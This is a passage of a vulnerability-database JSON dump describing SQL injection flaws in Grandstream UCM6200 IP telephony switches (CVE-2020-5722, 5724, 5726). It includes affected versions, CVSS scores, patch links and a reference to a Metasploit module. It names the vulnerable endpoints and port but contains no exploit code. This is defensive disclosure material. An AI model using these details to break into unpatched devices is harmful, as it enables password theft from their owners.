          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "date": "2020-03-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "date": "2022-01-25T16:34:16",
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "date": "2020-03-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "date": "2020-04-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "date": "2020-03-23T20:15:12.043000",
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "date": "2022-01-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "date": "2020-04-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "date": "2025-10-31T22:11:59.510000",
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1437

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1437",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          }
        ]
      },
      "cve": "CVE-2020-5724",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5724",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003469",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-20680",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5724",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003469",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5724",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003469",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20680",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1714",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5724",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5724",
            "trust": 3.1
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "id": "VAR-202003-1437",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.363000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-20680)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211859"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113109"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5724"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5724"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/89.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "date": "2020-03-30T20:15:20.087000",
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-05-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "date": "2024-11-21T05:34:29.297000",
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1439

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1439",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5726",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5726",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003471",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-24401",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5726",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003471",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5726",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003471",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-24401",
                "trust": 0.6,
